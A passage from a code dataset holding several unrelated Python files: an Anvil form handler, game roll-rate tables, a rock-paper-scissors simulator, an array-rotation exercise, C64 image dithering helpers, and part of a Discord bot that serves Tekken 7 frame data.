\"\"\"This method is called when the button is clicked\"\"\"\n query = anvil.server.call('query_generator', \n self.title.text,\n self.KQ.text)\n if query:\n self.result1.visible = True\n self.result1.text = query[0]\n self.result2.visible = True\n self.result2.text = query[1]\n self.result3.visible = True\n self.result3.text = query[2]\n","repo_name":"gpadam/interactive-query-design-app","sub_path":"client_code/Form1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31698795333","text":"\"\"\"\nMaps tiers to roll rates for all food items at that tier and lower.\n\"\"\"\n\n# Local application imports\nfrom gym_snape.game.utils import RollRate\nfrom gym_snape.game.food.tier1 import *\nfrom gym_snape.game.food.tier2 import *\nfrom gym_snape.game.food.tier3 import *\nfrom gym_snape.game.food.tier4 import *\nfrom gym_snape.game.food.tier5 import *\nfrom gym_snape.game.food.tier6 import *\n\nroll_rates = {\n 1: [\n RollRate(Apple, 0.5),\n RollRate(Honey, 0.5)\n ],\n 2: [\n RollRate(Apple, 0.2),\n RollRate(Honey, 0.2),\n RollRate(Cupcake, 0.2),\n RollRate(MeatBone, 0.2),\n RollRate(SleepingPill, 0.2)\n ],\n 3: [\n RollRate(Apple, 0.1),\n RollRate(Honey, 0.15),\n RollRate(Cupcake, 0.15),\n RollRate(MeatBone, 0.15),\n RollRate(SleepingPill, 0.15),\n RollRate(Garlic, 0.15),\n RollRate(SaladBowl, 0.15)\n ],\n 4: [\n RollRate(Apple, 0),\n RollRate(Honey, 0.05),\n RollRate(Cupcake, 0.05),\n RollRate(MeatBone, 0.15),\n RollRate(SleepingPill, 0.15),\n RollRate(Garlic, 0.15),\n RollRate(SaladBowl, 0.15),\n RollRate(CannedFood, 0.15),\n RollRate(Pear, 0.15)\n ],\n 5: [\n RollRate(Apple, 0),\n RollRate(Honey, 0),\n RollRate(Cupcake, 0),\n RollRate(MeatBone, 0.1),\n RollRate(SleepingPill, 0.1),\n RollRate(Garlic, 0.1),\n RollRate(SaladBowl, 0.1),\n RollRate(CannedFood, 0.12),\n RollRate(Pear, 0.12),\n RollRate(Chili, 0.12),\n RollRate(Chocolate, 0.12),\n RollRate(Sushi, 0.12)\n ],\n 6: [\n RollRate(Apple, 0),\n RollRate(Honey, 0),\n RollRate(Cupcake, 0),\n RollRate(MeatBone, 0),\n RollRate(SleepingPill, 0),\n RollRate(Garlic, 0.05),\n RollRate(SaladBowl, 0.05),\n RollRate(CannedFood, 0.1),\n RollRate(Pear, 0.1),\n RollRate(Chili, 0.1),\n RollRate(Chocolate, 0.1),\n RollRate(Sushi, 0.1),\n RollRate(Melon, 0.1),\n RollRate(Mushroom, 0.1),\n RollRate(Pizza, 0.1),\n RollRate(Steak, 0.1)\n ]\n}\n\nif __name__ == '__main__':\n \"\"\"Check that all roll rates are valid.\"\"\"\n # Lazy import since only need numpy for this test\n import numpy as np\n for i in sorted(roll_rates.keys()):\n food, rates = [], []\n for rr in roll_rates[i]:\n food.append(rr.item)\n rates.append(rr.rate)\n try:\n np.random.choice(food, p=rates, size=1)\n except:\n print(f'Could not sample from tier {i}')\n print(f'Summed to {np.sum(rates)}')\n","repo_name":"jasonjewik/gym-snape","sub_path":"gym-snape/gym_snape/game/food/roll_rates.py","file_name":"roll_rates.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"17725057715","text":"from random import sample\nfrom time import sleep\n\ndef _players_generator(rounds):\n rounds = rounds\n options = [\"R\", \"P\", \"S\"]\n for i in range(rounds):\n player1 = sample(options*rounds, rounds)\n player2 = sample(options*rounds, rounds)\n \n return player1, player2\n\ndef check_results(rounds):\n player1, player2 = _players_generator(rounds)\n\n player1_wins = 0\n player2_wins = 0\n n = 0\n\n while rounds != 0:\n results = [player1[n], player2[n]]\n print(f'Round {n+1}:')\n rounds -= 1\n n += 1\n\n #Tie cases\n if results[0] == \"S\" and results[1] == \"S\":\n print(\"TIE\\n\")\n elif results[0] == \"P\" and results[1] == \"P\":\n print(\"TIE\\n\")\n elif results[0] == \"R\" and results[1] == \"R\":\n print(\"TIE\\n\")\n \n #Player1 wins cases\n elif results[0] == \"S\" and results[1] == \"P\":\n print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n elif results[0] == \"R\" and results[1] == \"S\":\n print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n elif results[0] == \"P\" and results[1] == \"R\":\n print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n \n #Player2 wins cases\n elif results[0] == \"S\" and results[1] == \"R\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n elif results[0] == \"P\" and results[1] == \"S\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n elif results[0] == \"R\" and results[1] == \"P\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n\n sleep(0.8)\n \n if player1_wins > player2_wins:\n print(f'PLAYER 1 WINS BY {player1_wins}|{player2_wins}\\n')\n elif player1_wins < player2_wins:\n print(f'PLAYER 2 WINS BY {player2_wins}|{player1_wins}\\n')\n elif player1_wins == player2_wins:\n print(f'TIE BY {player1_wins}|{player2_wins}\\n')\n\ndef play():\n rounds = input(\"How many rounds do you want?\\nNumber of rounds: \")\n check_results(int(rounds))\n\nif __name__ == '__main__':\n play()\n","repo_name":"VarmiloVA/Rock-paper-scissors-Weekly-Challenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13034964634","text":"def circularArrayRotation(a, k, queries):\n\n for i in range(k % len(a)):\n temp = a[len(a) - 1]\n for j in range(len(a)-1, 0, -1):\n a[j] = a[j-1]\n a[0] = temp\n\n rotatedArray = []\n for i in queries:\n rotatedArray.append(a[i])\n return rotatedArray\n\n\nprint(circularArrayRotation([1, 2, 3, 4, 5], 12, [0, 1, 2, 3, 4]))\n","repo_name":"sumanth-vs/HackerRank","sub_path":"circArray.py","file_name":"circArray.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10732359740","text":"#!python3\n\nimport ui\nimport ImageEnhance\nimport ImageFilter\nimport ImageOps\nimport numpy\nimport colorsys\nfrom time import time\nimport math\n\nfrom PIL import Image\nfrom io import BytesIO\n\n\n# Convert colors from [0,255] to [0,1]\ndef color_to_1(color):\n\t#return (color[0]/255.0, color[1]/255.0, color[2]/255.0, 1.0)\n\treturn (color[0]/255.0, color[1]/255.0, color[2]/255.0)\n\t\n\ndef color_to_255(color):\n\treturn (int(color[0]*255), int(color[1]*255), int(color[2]*255))\n\n\n# Old function - kept as backup\t\t\t\ndef closest_in_palette(match_color, color_palette):\n\ti = 0\n\tbestDelta = 1000\n\tc = 0\n\tfor color in color_palette:\n\t\tr = sorted((color[0], match_color[0]))\n\t\tg = sorted((color[1], match_color[1]))\n\t\tb = sorted((color[2], match_color[2]))\n\t\tdelta = r[1]-r[0] + g[1]-g[0] + b[1]-b[0]\n\t\tif delta < bestDelta:\n\t\t\ti = c\n\t\t\tbestDelta = delta\n\t\tc = c + 1\n\treturn color_palette[i]\n\n\ndef closest_color(match_color, conversion_palette):\n\tcolor_distances = list()\n\tfor c in conversion_palette:\n\t\tcolor_distances.append((colordistance(match_color, c[0]), c[0]))\n\tcolor_distances.sort(key=lambda tup: tup[0])\t\n\treturn color_distances[0][1]\n\n\n# sRGB to linear\n# Input and output is in the range of 0..255\ndef to_linear(value, gamma_value):\n\tif value <= 0:\n\t\treturn 0\n\tif value >= 255:\n\t\treturn 255\n\tvalue = float(value)/255\n\tif value <= 0.04045:\n\t\treturn (value/12.92)*255\n\treturn (((value+0.055)/1.055)**gamma_value)*255\n\t\n\t# 0 <= S <= 0.04045: L = S/12.92\n\t# 0.04045 < S <+ 1: L = ((S+0.055)/1.055)**2.4\n\n\t\t\ndef srgb_to_linear(color, gamma_value):\n\tcolor = to_linear(color[0], gamma_value), to_linear(color[1], gamma_value), to_linear(color[2], gamma_value)\n\t#(rm, gm, bm) = lumabalance\n\t#color = color[0]*rm, color[1]*gm, color[2]*bm\n\treturn color\n\n\n# Linear to sRGB\n# Input and output is in the range of 0..255\ndef from_linear(value, gamma_value):\n\tif value <= 0:\n\t\treturn 0\n\tif value >= 255:\n\t\treturn 255\n\tvalue = float(value)/255\n\tif value <= 0.0031308:\n\t\treturn (value*12.92)*255\n\treturn ((1.055*value)**(1/gamma_value) - 0.055)*255\n\t\n\t# 0 <= L <= 0.0031308: S = L*12.92\n\t# 0.0031308 < L <= 1: S = (1.055*L)**(1/2.4) - 0.055\n\n\t\t\ndef linear_to_srgb(color, gamma_value):\n\t#(rm, gm, bm) = lumabalance\n\t#color = float(color[0])/rm, float(color[1])/gm, float(color[2])/bm\n\tcolor = from_linear(color[0], gamma_value), from_linear(color[1], gamma_value), from_linear(color[2], gamma_value)\n\treturn color\n\n\ndef lumabalance_mult(color):\n\t#lumabalance = [0.299, 0.587, 0.114]\n\t#lumabalance = [1-0.299, 1-0.587, 1-0.114]\n\t#lumabalance = [0.9, 0.7, 1.0] # First testvalues\n\t#lumabalance = [0.9, 1.0, 0.7]\n\t#lumabalance = [1.0, 1.0, 1.0] # Debug\n\t#(rm, gm, bm) = lumabalance\n\t(rm, gm, bm) = [0.9, 1.0, 0.7]\n\tcolor = color[0]*rm, color[1]*gm, color[2]*bm\n\treturn color\n\ndef colordistance(col1, col2):\n\t(r1,g1,b1) = col1[0], col1[1], col1[2]\n\t(r2,g2,b2) = col2[0], col2[1], col2[2]\n\treturn math.sqrt((r1 - r2)**2 + (g1 - g2)**2 + (b1 - b2)**2)\n\n\t\n\t\t\t\n# Check if number is even or odd, used by dithered paint mode\ndef is_odd(x):\n\treturn (x % 2)\n\t\n\t\ndef xy_to_index(xcoord, ycoord, actual_width, maximum=31999):\n\tarrayIndex = int((ycoord*actual_width) + xcoord)\n\tif arrayIndex > maximum:\n\t\tprint ('Illegal index:' + str(arrayIndex) + ', coord:[' + str(xcoord) + ',' + str(ycoord) + ']')\n\t\treturn False\n\treturn arrayIndex\n\t\n\n# Is this even used?\t\ndef index_to_xy(arrayIndex, actual_width):\n\tycoord = int(arrayIndex/actual_width)\n\txcoord = arrayIndex - (actual_width * ycoord)\n\treturn (xcoord, ycoord)\n\t\n\t\n# Convert from PIL Image to ui.image\n# Translates image data from the Python Image Lib to the iOS ui\ndef pil_to_ui(img):\n\twith BytesIO() as bIO:\n\t\timg.save(bIO, 'png')\n\t\treturn ui.Image.from_data(bIO.getvalue()) # 'PY_SSIZE_T_CLEAN macro must be defined for '#' formats'\n\t\t\n\t\t# Above version failed to work for a few versions. Here's the workaround just in case:\n\t\t#img.save('temp/preview.png')\n\t\t#return ui.Image.named('temp/preview.png')\n\t\t\n\t\t\n# Convert from ui.image to PIL Image\ndef ui_to_pil(img):\n\treturn Image.open(BytesIO(img.to_png()))\n\t\n\t\ndef pixels_to_png(bg_color, pixels, width, height):\n\t# Create image\n\tbgColor = color_to_255(bg_color)\n\tim = Image.new(\"RGB\", (int(width), int(height)), bgColor)\n\t# Fill with pixels\n\tfor p in pixels:\n\t\tpixelCol = bgColor\n\t\t# convert pixel data from RGBA 0..1 to RGB 0..255\n\t\tpixelCol = color_to_255(p.color)\n\t\tim.putpixel((int(p.position[0]*2), p.position[1]), pixelCol)\n\t\tim.putpixel((int(p.position[0]*2)+1, p.position[1]), pixelCol)\n\treturn im\n\t\n\t\ndef pixels_to_file(bg_color, pixels, width, height, filename):\n\tim = pixels_to_png(bg_color, pixels, width, height)\n\tim.save(filename)\n\treturn True\n\n\t\t\ndef file_to_img(filename, actual_width, height, antialias=False):\n\t# Do a check for file type\n\tim = Image.open(filename).convert('RGBA') # Open as PIL image\n\tscalefilter = Image.NEAREST\n\t\n\tprint('Loading image ' + str(filename) + ' with size:' + str(im.size))\n\t\n\t# If the image is 320 by 200 pixels, we resize it to 160 by 200\n\tif im.size == (actual_width*2, height):\n\t\t#print('Scale mode 1 on ' + str(filename))\n\t\tim = im.resize((int(actual_width), int(height)), scalefilter)\n\t\n\t# Image size differs, we crop the image and do an aspect ratio conversion\n\telse:\n\t\t#print('Scale mode 2 on ' + str(filename))\n\t\tim = ImageOps.fit(im, (300,200))\n\t\tim = im.resize((actual_width, height), scalefilter)\n\t\n\treturn im\n\t\n\t\n# Takes character index as an input at returns all indices for the character that index contains\ndef get_char(index):\n\t# charNum = ((index/1280)*40) + (int(index/4)%40)\n\tcharNum = numpy.array([0,1,2,3,160,161,162,163,320,321,322,323,480,481,482,483,\n\t640,641,642,643,800,801,802,803,960,961,962,963,1120,1121,1122,1123])\n\tfirstCharIndex = (int(index/1280)*1280) + ((int(index/4)%40)*4)\n\tcharArray = charNum + firstCharIndex\n\treturn charArray\n\n\t\t\ndef pngstrip(basestring):\n\tif basestring[-4:] == '.png':\n\t\treturn basestring[:-4]\n\telse:\n\t\treturn basestring\n\n\ndef build_button(self, button_name, button_width, button_pos, button_action, buttcol, backcol, textcol):\n\t\tmybutt = ui.Button(name=button_name, title=button_name)\n\t\tmybutt.height = 32-2\n\t\tmybutt.width = button_width-2\n\t\tmybutt.center = (button_pos[0]+(button_width*0.5), button_pos[1]+16)\n\t\t#mybutt.background_color = 'black'\n\t\tmybutt.background_color = buttcol\n\t\tmybutt.tint_color = textcol\n\t\tmybutt.corner_radius = 6\n\t\tmybutt.action = button_action\n\t\tself.add_subview(mybutt)\n\t\treturn mybutt\n\t\n\n\t\n#def convert_c64(img, conversion_palette, gamma_value, palette_gamma, c64color_names, dither_method, dither_pattern_data, dither_pattern, Settings, startline=0, endline=20): #dither_distance_range, startline=0, endline=20):\n#\tdither_distance_range = Settings.dither_distance_range\n\ndef convert_c64(img, conversion_palette, gamma_value, palette_gamma, c64color_names, dither_method, dither_pattern_data, dither_pattern, dither_distance_range, dither_range, startline=0, endline=20):\t\n\tfor ycoord in range(startline, endline):\n\t\tfor xcoord in range(0, img.width):\n\t\t\t#if ycoord%10 > 4:\n\t\t\t#\timg.putpixel((xcoord,ycoord),img.getpixel((xcoord,ycoord)))\n\t\t\t#else:\n\t\t\tpixelcol = srgb_to_linear(img.getpixel((xcoord,ycoord)), gamma_value)\n\t\t\tif dither_method == 2:\n\t\t\t\t# Additive dither\n\t\t\t\tpixelcol = dither_additive(pixelcol, (xcoord,ycoord), conversion_palette, dither_pattern_data, dither_pattern, dither_distance_range)\n\t\t\telif dither_method == 3:\n\t\t\t\t# Triangle dither\n\t\t\t\tpixelcol = dither_blends(pixelcol, conversion_palette, palette_gamma, c64color_names, (xcoord,ycoord), dither_range, dither_pattern_data, dither_pattern)\n\t\t\telse:\n\t\t\t\t# Nearest color\n\t\t\t\tpixelcol = closest_color(pixelcol, conversion_palette)\n\t\t\t\n\t\t\tpixelcol = max(0, pixelcol[0]), max(0, pixelcol[1]), max(0, pixelcol[2])\n\t\t\tpixelcol = linear_to_srgb(pixelcol, gamma_value)\n\t\t\timg.putpixel((xcoord,ycoord),((int(pixelcol[0])),int(pixelcol[1]),int(pixelcol[2])))\n\treturn img\n\n\ndef resize_into_img(img, width, height, scalefilter=Image.NEAREST):\n\tif float(img.width)/float(img.height) < float(width)/float(height):\n\t\tprint ('Image is taller than wide')\n\t\tresize_width = img.width * height / img.height\n\t\tresize_height = height\n\telse:\n\t\tresize_width = width\n\t\tresize_height = img.height * width / img.width\n\timage_resize = img.resize((resize_width, resize_height), scalefilter)\n\tprint('Image scaled to:' + str(image_resize.size))\n\tbackground = Image.new('RGBA', (width, height), (0, 0, 0, 255))\n\toffset = ((width - resize_width) / 2, (height - resize_height) / 2)\n\t#offset = (50,50)\n\tbackground.paste(image_resize, offset)\n\treturn background.convert('RGB')\n\n\ndef scale_img(img, antialias_method, width, height, aspect_method, crop_method):\n\t\n\tscalefilter = Image.NEAREST\n\tif antialias_method == 2:\n\t\tscalefilter = Image.ANTIALIAS\n\t\n\t#img = img.filter(ImageFilter.SMOOTH_MORE)\n\t\t\t\t\n\t# Image size differs, we crop the image and do an aspect ratio conversion\n\tif img.size != (width*2, height):\n\t\tif aspect_method == 1:\n\t\t\timgwidth = 300\n\t\telse:\n\t\t\timgwidth = 320\n\t\tif crop_method == 1:\n\t\t\timg = ImageOps.fit(img, (imgwidth,200))\n\t\telse:\n\t\t\timg = resize_into_img(img, imgwidth, 200, scalefilter)\n\t# Finally, resize to C64 non-square pixels\n\timg = img.resize((width, height), scalefilter)\n\t\n\treturn img\n\n\ndef filter_img(img, contrast=1.0, brightness=1.0, saturation=1.0):\n\tenhancer = ImageEnhance.Brightness(img)\n\timg = enhancer.enhance(brightness)\n\t\n\tenhancer = ImageEnhance.Contrast(img)\n\timg = enhancer.enhance(contrast)\n\t\n\tenhancer = ImageEnhance.Color(img) # Saturation\n\timg = enhancer.enhance(saturation)\n\t\n\t# Blur the color channel to reduce color noise\n\t#colorsys.rgb_to_hls(r, g, b)\n\t#img = img.convert('HSV')\n\t#(old_h, old_s, old_v) = img.split()\n\t\n\t#img = img.filter(ImageFilter.BLUR)\n\t#(blur_h, blur_s, blur_v) = img.split()\n\t#img = Image.merge('HSV', (blur_h, old_s, old_v))\n\t\n\t#img = img.convert('RGB')\n\t\n\t#img = img.filter(ImageFilter.MedianFilter(3))\n\t#img = img.filter(ImageFilter.SMOOTH_MORE)\n\t\n\treturn img\n\n\n\n# Not used at the moment\ndef dither_twocolors(match_color, conversion_palette, c64_color_names, palette_gamma, dither_distance_range, dither_pattern_data, dither_pattern, index, pos):\n\t# Todo: Revise this, something isnt quite working\n\tdistance = conversionpalette[index][2]\n\tcolor1index = c64color_names.index(conversionpalette[index][3])\n\tcolor2index = c64color_names.index(conversionpalette[index][4])\n\tcolor1 = palette_gamma[color1index]\n\tcolor2 = palette_gamma[color2index]\n\t\n\tdist1 = colordistance(match_color, color1)\n\tdist2 = colordistance(match_color, color2)\n\t\n\tsafezone = dither_distance_range\n\t\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\t\n\tditherx = pos[0]%len(dithertable[0])\n\tdithery = pos[1]%len(dithertable)\n\tditherlookup = dithertable[dithery][ditherx]\n\tdist = 0.5\n\t\n\t#if ditherx == 0 and dithery == 0:\n\t#\treturn (128,0,0)\n\t\n\t#temprgb1 = int(dist1)\n\t#temprgb2 = int(dist2)\n\t#return (temprgb1, 0, temprgb2)\n\t\n\tif dist1 < dist2:\n\t\tdist = (dist1-safezone) / (distance-safezone*2)\n\telse:\n\t\tdist = 1.0 - ( (dist2-safezone) / (distance-safezone*2) )\n\t\n\tif ditherlookup > dist:\n\t\treturn color1\n\telse:\n\t\treturn color2\n\n\n# Triangle dithering: \n# Scalar projects the pixel down to the vector of the two colors to be dithered.\n# Calculates the dither based on where the projection lands on the line.\ndef dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, index, position, dither_range, dither_pattern_data, dither_pattern):\n\tif match_color[0] <= palette_gamma[0][0] and match_color[1] <= palette_gamma[0][1] and match_color[2] <= palette_gamma[0][2]:\n\t\treturn palette_gamma[0]\n\tif match_color[0] >= palette_gamma[1][0] and match_color[1] >= palette_gamma[1][1] and match_color[2] >= palette_gamma[1][2]:\n\t\treturn palette_gamma[1]\n\t\n\t# Todo: This might need a gamma and luma correction\n\tcolor1index = c64color_names.index(conversion_palette[index][3])\n\tcolor2index = c64color_names.index(conversion_palette[index][4])\n\tcol1 = palette_gamma[color1index]\t# Darker color\n\tcol2 = palette_gamma[color2index]\t# Brighter color\n\t\n\t# Unit vector of col1->col2\n\tcolvec = (col2[0]-col1[0], col2[1]-col1[1], col2[2]-col1[2])\n\t#coldist = math.sqrt((colvec[0]*colvec[0])+(colvec[0]*colvec[0])+(colvec[0]*colvec[0]))\n\tcoldist = conversion_palette[index][2]\n\t\n\t# Calculate scalar projection of matchcol->col1 onto col1->col2\n\tmatchvec = (match_color[0]-col1[0], match_color[1]-col1[1], match_color[2]-col1[2])\n\tprojlength = float((matchvec[0]*colvec[0])+(matchvec[1]*colvec[1])+(matchvec[2]*colvec[2])) / coldist\n\t\n\t# Divide the length by the precalc length. This will be our gradient ratio!\n\tgradratio = projlength / coldist\n\t\n\tif dither_range == 0:\n\t\treturn col2\n\t\t#if gradratio < 0.5:\n\t\t#\treturn col1\n\t\t#else:\n\t\t#\treturn col2\n\t\n\tif dither_range != 1:\n\t\t# Offset 0 by the dither range, make sure it doesnt get negative\n\t\t# gradratio and dither_range runs between 0 and 1\n\t\t\n\t\t#gradratio = gradratio -(dither_range* 0.5) \n\t\t#gradratio = ((gradratio+0.5) / dither_range)\n\t\t\n\t\tgradratio = (gradratio / dither_range) #- (gradratio * 0.5)\n\t\t#gradratio = (gradratio-0.5)*2\n\t\t\n\t\t#gradratio = (gradratio / dither_range)\n\t\t#gradratio = (-0.5 * (1.0 - dither_range)) + (gradratio / dither_range)\n\t\t\n\t\t#return (int(projlength), 0, 0)\n\t\t#return (int(gradratio*255), 0, 0)\n\t\n\t# Debug colours\t\n\t#if position[1]%66 > 33:\n\t#\treturn(int(255*gradratio), 0, 0)\n\t\t\t\t\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\tditherx = position[0]%len(dithertable[0])\n\tdithery = position[1]%len(dithertable)\n\tditherlookup = dithertable[dithery][ditherx]\n\t\n\tif ditherlookup > gradratio:\n\t\treturn col1\n\telse:\n\t\treturn col2\n\n\t\t\ndef dither_blends(match_color, conversion_palette, palette_gamma, c64color_names, position, dither_range, dither_pattern_data, dither_pattern):\n\ti = 0\n\tbest_distance = 1000\n\t\n\tfor c in range(0, len(conversion_palette)):\n\t\tif conversion_palette[c][1] == 'mix':\n\t\t\tpalette_color = conversion_palette[c][0]\n\t\t\tdistance = colordistance(palette_color, match_color)\n\t\t\tif distance < best_distance:\n\t\t\t\ti = c\n\t\t\t\tbest_distance = distance\n\t\t\tc = c + 1\n\t\t\n\t#### Temp color test!\n\t#return conversion_palette[i][0]\n\t####\t\t\t\n\t\n\t#### Temp color test!\n\treturn dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, i, position, dither_range, dither_pattern_data, dither_pattern)\n\t\t\t\t\t\t\t\t\t\t\n\tif conversion_palette[i][1] == 'base':\n\t\treturn conversion_palette[i][0]\n\n\telif conversion_palette[i][1] == 'replace':\n\t\tcolorname = conversion_palette[i][2]\n\t\treturn palette_gamma[c64color_names.index(colorname)] \n\n\telif conversion_palette[i][1] == 'mix':\n\t\treturn dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, i, position, dither_range, dither_pattern_data, dither_pattern)\n\t\t\n\telse: \n\t\treturn (0,0,255)\n\n\t\t\t\ndef dither_additive(match_color, position, conversion_palette, dither_pattern_data, dither_pattern, dither_distance_range):\n\t# Add dither matrix to match_color\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\tditherx = position[0]%len(dithertable[0])\n\tdithery = position[1]%len(dithertable)\n\t#ditherlookup = dithertable[dithery][ditherx] * -40\n\t#ditherlookup = ( dithertable[dithery][ditherx] * dither_distance_range )\n\tditherlookup = (dithertable[dithery][ditherx] * dither_distance_range * 1.7) - (dither_distance_range*1.0)\n\tmatch_color = match_color[0] + ditherlookup, match_color[1] + ditherlookup, match_color[2] + ditherlookup\n\t\n\t# Debug\n\t#return match_color\n\t\t\t\t\n\t# Calculate the distance to all colors in the palette, then sort by distance\n\tclosest_match = closest_color(match_color, conversion_palette)\n\t\n\t# Return the closest color\n\treturn closest_match\n\t\n\n","repo_name":"superrune/Redux-Paint","sub_path":"include/redux_functions.py","file_name":"redux_functions.py","file_ext":"py","file_size_in_byte":15543,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"2983776991","text":"import discord\nimport asyncio\nimport logging\nfrom discord.ext import commands\n\n# self-created modules below\nimport lib.embedCreation as embedCreation #contains functions for creating an embed\nimport lib.tekkenFinder as tekkenFinder #contains functions for finding character and move details\n\n# Get token from local dir text file\ntokenFile = open(\"token.txt\", 'r')\ntoken = tokenFile.read()\ntokenFile.close()\n\ndescription = 'A Tekken 7 Frame Data Bot made by Hann.'\n\nprefix = '.'\n\ndiscord_logger = logging.getLogger('discord')\ndiscord_logger.setLevel(logging.CRITICAL)\nlog = logging.getLogger()\nlog.setLevel(logging.INFO)\nhandler = logging.FileHandler(filename='combot.log', encoding='utf-8', mode='w')\nlog.addHandler(handler)\n\nbot = commands.Bot(command_prefix=prefix, description=description)\n\ncombot_gagged_channels_File = open(\"lib/gagged_channels.txt\", 'r')\ncombot_gagged_channels = combot_gagged_channels_File.read().splitlines()\ncombot_gagged_channels_File.close()\n\n# TODO: YOU LEFT OFF HERE\n# TODO: MAYBE NEXT TIME FAM\n# file = open('bot_settings.json', 'r+')\n# content = file.read()\n# file.close()\n# stuff = content.loads(content)\n\n@bot.event\nasync def on_ready():\n # Display Login Status in Console\n print('<---------------------------->')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('<---------------------------->')\n while True:\n await bot.change_presence(game=discord.Game(name='DAH'))\n await asyncio.sleep(30)\n await bot.change_presence(game=discord.Game(name='.help'))\n await asyncio.sleep(120)\n await bot.change_presence(game=discord.Game(name='Riri Toppu Tieru'))\n await asyncio.sleep(30)\n await bot.change_presence(game=discord.Game(name='TEKKEN 7'))\n await asyncio.sleep(30)\n\n@bot.event\nasync def on_message(message):\n # check if message author is a bot\n if message.author.bot:\n # check if sent by self\n if message.author.id == bot.user.id:\n await bot_message_cleanup(message)\n return\n if await is_Gagged(message):\n return\n\n if message.content.startswith('!'):\n if message.content.startswith('!!'):\n case_sensitive_toggle = True\n else:\n case_sensitive_toggle = False\n\n # message content should look like this\n # ![character] [move]\n\n userMessage = message.content\n userMessage = userMessage.replace(\"!\", \"\")\n user_message_list = userMessage.split(\" \", 1)\n\n if len(user_message_list) <= 1:\n print('! command used, but character not found/move not given\\n')\n return\n\n user_Chara_Name = user_message_list[0]\n user_Chara_Move = user_message_list[1]\n\n #TODO: IMPLEMENT CHARACTER SHORTHAND NAME CONVERTER, OR CHARACTER NAMELIST DISPLAY\n character_name_string = tekkenFinder.does_char_exist(user_Chara_Name)\n\n if character_name_string:\n user_Chara_Name = character_name_string.lower()\n move_attribute_dict = tekkenFinder.get_Move_Details(user_Chara_Name,\n user_Chara_Move,\n case_sensitive_toggle)\n\n if move_attribute_dict: # if dictionary not empty, move found\n embed_MoveFound = await get_MoveFound_Embed(**move_attribute_dict)\n await bot.send_message(message.channel, embed=embed_MoveFound)\n\n else: # dictionary is empty, move not found\n embed_SimilarMoves = await get_SimilarMoves_Embed(user_Chara_Name,user_Chara_Move)\n await bot.send_message(message.channel, embed=embed_SimilarMoves)\n\n await user_message_cleanup(message)\n return\n\n else:\n await bot.send_message(message.channel, 'Character not found: ' + '**' + user_Chara_Name + '**')\n return\n\n await bot.process_commands(message)\n\n\n@bot.command(pass_context=True)\nasync def legend(ctx):\n \"\"\"Displays commonly used abbreviations, notations and their corresponding input icons.\"\"\"\n embed_legend = embedCreation.embed_legend()\n await bot.say(embed=embed_legend)\n await user_message_cleanup(ctx.message)\n\n\n@bot.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def gagcombot(ctx):\n \"\"\"Gags Combot in this channel. Usable only by admin roles.\"\"\"\n channel = ctx.message.channel.id\n combot_gagged_channels.append(channel)\n\n f = open(\"lib/gagged_channels.txt\",\"a\")\n f.write(channel + '\\n')\n f.close()\n\n await bot.say('Mmmph! Gagging Combot.')\n\n\n@bot.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def ungagcombot(ctx):\n \"\"\"Ungags Combot in this channel. Usable only by server admins.\"\"\"\n channel = ctx.message.channel.id\n if channel in combot_gagged_channels:\n combot_gagged_channels.remove(channel)\n else:\n return\n # clear file contents and rewrite\n open(\"lib/gagged_channels.txt\", \"w\").close()\n f = open(\"lib/gagged_channels.txt\", \"a\")\n for channel in combot_gagged_channels:\n f.write(channel+'\\n')\n f.close()\n\n await bot.say('Ungagged Combot. Beep Boop.')\n\n\n@bot.command(pass_context=True)\nasync def printServers(ctx):\n \"\"\"List servers with Combot. Cmd restricted to Bot Owner.\"\"\"\n appinfo = await bot.application_info()\n owner = appinfo.owner.id\n\n if ctx.message.author.id != owner:\n print('Non-bot owner called print server.')\n await bot.say('Command restricted to bot owner only.')\n await user_message_cleanup(ctx.message)\n return\n else:\n print('Bot Owner called print server.')\n\n serverConctStr = ''\n for server in bot.servers:\n serverConctStr = serverConctStr + server.name + '\\n'\n await bot.say('Server List: \\n' + serverConctStr)\n await user_message_cleanup(ctx.message)\n\n\n@bot.command(pass_context=True)\nasync def Frame_Data(ctx):\n \"\"\"Use ![character] [move], !! for case-sensitive search\"\"\"\n await user_message_cleanup(ctx.message)\n return\n\n\n@bot.command(pass_context=True)\nasync def invite(ctx):\n \"\"\"Invite the bot to your server.\"\"\"\n await bot.say('Use this link to add me to your server. \\nhttps://discordapp.com/oauth2/authorize?client_id=302295833208946689&scope=bot&permissions=11264')\n await user_message_cleanup(ctx.message)\n return\n\n\n# This block of code to be used when character html pages are updated, do not edit\n@bot.command(pass_context=True)\nasync def convertAll(ctx):\n \"\"\"Converts all \"\"\"\n appinfo = await bot.application_info()\n owner = appinfo.owner.id\n\n if ctx.message.author.id != owner:\n return\n else:\n await bot.say('Converting all character htmls to json.')\n tekkenFinder.charJsonMassConverter()\n return\n\n\n@bot.event\nasync def on_command_error(error, ctx):\n if isinstance(error, commands.CheckFailure):\n await bot.send_message(ctx.message.channel, \"You don't have permissions to run this.\")\n\n# ==============================================\n# ==========NON COMMAND 